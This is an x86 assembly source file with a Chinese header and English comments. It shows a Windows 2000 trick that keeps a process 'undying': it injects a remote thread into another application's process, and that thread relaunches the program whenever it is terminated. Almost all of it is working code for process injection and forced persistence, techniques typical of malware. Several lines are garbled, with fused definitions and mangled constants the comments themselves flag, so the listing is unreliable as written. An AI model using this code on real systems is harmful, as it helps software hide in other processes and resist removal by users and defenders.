此段程序采用公开的 Win2k注射远程线程,来保护指定进程始终处于运行状态,
WIN技巧:Win2k下进程不死术。
生成wap32.exe拷贝到c:\下运行,则Wap32进程不死。
; --------------------------------------------------------------------------
; Win2k "process cannot die" demo: an injector (Start) plus a small routine
; (Protect2kProc) that is copied into another process and run there as a
; thread.  Intel syntax, 32-bit flat model, stdcall; the `call target,args`
; form used below is the TASM/MASM extended call that pushes the arguments
; right-to-left.  Win32.inc is not on this page; the named constants
; (PROCESS_ALL_ACCESS, FALSE, NULL, ...) take their values from it.
; --------------------------------------------------------------------------
include Win32.inc
.386                                    ; 80386 instruction set, 32-bit code
.model flat,stdcall                     ; flat addressing; procedures with parameters get an assembler-generated frame and callee-pops
.data                                   ; NOTE: Protect2kProc below is deliberately assembled into the writable .data section (see its header)
;-----------------------------------------------------------------------
; DWORD WINAPI Protect2kProc(DWORD ProcID)      -- remote thread entry
;
; This routine is NOT executed in this image.  Start copies 1000h bytes
; beginning at Protect2kProc into another process (WriteProcessMemory) and
; starts a thread there at the copy's first byte (CreateRemoteThread), with
; lpParameter = the injector's own process id.  Because the copy lives at an
; address unknown at assembly time, nothing here may reference an absolute
; address: each `call label` / `pop reg` pair yields the run-time address of
; the dword slot (or of FileName) that follows the call.  The three dword
; slots are patched with API addresses by Start before the copy is made.
;
; Behaviour (as visible here): OpenProcess(ProcID) -> wait until that
; process exits -> WinExec(FileName).  I.e. when the injector dies, the
; host process relaunches it.
;
; In:    [ebp+8] = ProcID (the proc parameter; relies on the assembler's
;        generated prologue so that `ProcID` resolves to the stack slot)
; Out:   eax = whatever the last API call returned (thread exit code)
; Clobb: ebx is overwritten and not restored (callee-saved in Win32 ABI;
;        harmless for a thread entry, but a defect if called normally)
;-----------------------------------------------------------------------
Protect2kProc proc ProcID: dword
call GetKnlOpenProcess                  ; pushes the address of the dword below, then jumps over it
KnlOpenProcess dd ?                     ; slot: &OpenProcess, filled in by Start; never executed
GetKnlOpenProcess:
pop eax                                 ; eax = &KnlOpenProcess (run-time address in the host process)
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID  ; hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID)
or eax,eax                              ; NULL handle -> give up (thread just exits)
jz short ExitProtectProc
mov ebx,eax                             ; ebx = hProc (kept across the wait)
call GetKnlWaitForSingleObject          ; same call/pop trick for the next slot
KnlWaitForSingleObject dd ?             ; slot: &WaitForSingleObject
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h                      ; WaitForSingleObject(hProc, INFINITE) -- blocks until the injector exits; hProc is never closed
call GetFileNameAddress                 ; ecx := run-time address of this label ...
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress  ; ... plus the assembly-time distance to FileName = run-time &FileName in the copy
call GetKnlWinExec
KnlWinExec dd ?                         ; slot: &WinExec
GetKnlWinExec:
pop eax
call [eax],ecx,01                       ; WinExec(FileName, 1 /*SW_SHOWNORMAL*/) -- relaunch; return value unchecked
ExitProtectProc:
ret                                     ; assembler emits the matching epilogue (stdcall, pops ProcID)
Protect2kProc endp
; Strings that travel with the 1000h-byte copy (they follow the proc in
; .data) and strings used only by Start.  Only FileName is referenced from
; the injected routine; the Knl*Str names are GetProcAddress lookup keys.
FileName db "c:wap32.exe",0             ; path passed to WinExec; the backslash after "c:" was most likely lost in extraction (the header text says c:\) -- verify against the original listing
KnlOpenProcessStr db "OpenProcess",0KnlWaitForObjectStr db "WaitForSingleObject",0  ; two definitions fused onto one line (lost line break); as written "0KnlWaitForObjectStr" will not assemble
KnlWinExecStr db "WinExec",0
.code                                   ; everything from here on is the injector proper
; Imported Win32 APIs (TASM-style extrn).  OpenProcess/WaitForSingleObject/
; WinExec are ALSO resolved dynamically via GetProcAddress in Start, because
; the injected copy cannot use this image's import table.
extrn GetProcAddress: proc
extrn OpenProcess: proc
extrn FindWindowA: proc
extrn GetWindowThreadProcessId: proc
extrn VirtualAllocEx: proc
extrn VirtualFreeEx: proc               ; declared but only used on the commented-out line in Start
extrn WriteProcessMemory: proc
extrn GetCurrentProcessId: proc
extrn CreateRemoteThread: proc
extrn GetExitCodeThread: proc
extrn CloseHandle: proc
extrn WinExec: proc                     ; declared; the actual WinExec call happens in the injected routine via its patched slot
extrn MessageBoxA: proc
extrn Sleep: proc
;-----------------------------------------------------------------------
; Start -- program entry point (injector)
;
; 1. Resolve OpenProcess / WaitForSingleObject / WinExec and store the
;    pointers into the dword slots inside Protect2kProc.
; 2. Pick a host: the process owning the first top-level window FindWindowA
;    returns for (NULL, NULL) -- effectively arbitrary.
; 3. OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
;    (the canonical remote-thread injection sequence; on current systems this
;    is exactly what EDR / Sysmon event 8 flag, and DEP/CET-era hardening and
;    randomised DLL bases break the hard-coded addresses below).
;
; Register roles: ebx = host process handle, edi = remote buffer address.
; Stack slots pushed with `push eax` are reused as out-parameters (pid,
; bytes written, thread id).
;
; Defects visible here (not fixed in this page):
;  - GetProcAddress results are stored unchecked; a NULL slot makes the
;    remote thread `call [eax]` through 0.
;  - VirtualAllocEx failure jumps to OpenProcessError without CloseHandle(ebx).
;  - The CreateRemoteThread handle is never closed.
;  - The 1000h-byte copy reads 4 KiB past Protect2kProc regardless of how
;    much .data actually follows it.
;-----------------------------------------------------------------------
Start:
call GetProcAddress,077e60000h,offset KnlOpenProcessStr  ; 077e60000h = hard-coded module handle, presumably kernel32's base on the author's Win2k build; non-portable
mov KnlOpenProcess,eax                  ; patch slot inside Protect2kProc (possible because it lives in writable .data); eax not checked for NULL
call GetProcAddress,077e60000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax          ; unchecked
call GetProcAddress,077e60000h,offset KnlWinExecStr
mov KnlWinExec,eax                      ; unchecked
call FindWindowA,0,0                    ; hwnd of some top-level window (NULL class, NULL title)
push eax                                ; reserve a stack dword (initially = hwnd) to receive the owning pid
call GetWindowThreadProcessId,eax,esp   ; GetWindowThreadProcessId(hwnd, &slot) -> slot = pid
call OpenProcess,PROCESS_ALL_ACCESS,FALSE  ; only two args pushed: the pid slot left on the stack at [esp] serves as the 3rd (dwProcessId) and is popped by stdcall
or eax,eax
jz short OpenProcessError
mov ebx,eax                             ; ebx = hHost
call VirtualAllocEx,ebx,NULL,1000h,MEMMIT,L 40h  ; "MEMMIT" / "L 40h" look like garbled MEM_COMMIT and PAGE_EXECUTE_READWRITE (40h): an RWX allocation in a foreign process -- verify against the original listing
or eax,eax
jz short OpenProcessError               ; BUG: leaks ebx (no CloseHandle) on this path
mov edi,eax                             ; edi = remote buffer
push eax                                ; slot for lpNumberOfBytesWritten / lpThreadId / exit code (reused below)
call WriteProcessMemory,ebx,edi,OFF Protect2kProc,1000h,esp  ; copy 1000h bytes from Protect2kProc (and the strings after it); "OFF" is presumably a truncated `offset`
call GetCurrentProcessId                ; eax = our own pid -> becomes the remote thread's ProcID argument
call CreateRemoteThread,ebx,NULL,NULL,edi,eax,NULL,esp  ; thread in host at edi with lpParameter = our pid; thread id written to the slot
call GetExitCodeThread,eax,esp          ; exit code into the slot; result unused, thread handle (eax) never closed
pop eax                                 ; discard the slot
;call VirtualFreeEx,ebx,edi,1000h,MEM_DMIT
; ^ disabled: freeing the buffer while the remote thread still runs from it would crash the host ("MEM_DMIT" likely garbled MEM_DECOMMIT)
call CloseHandle,ebx                    ; close host process handle (success path only)
call Sleep,100h                         ; 256 ms; presumably gives the remote thread time to start -- intent not stated in the listing
call MessageBoxA,0,offset FileName,offset FileName,0  ; shows the path as both text and caption
OpenProcessError:
ret                                     ; return to the CRT/loader; the injected thread outlives this process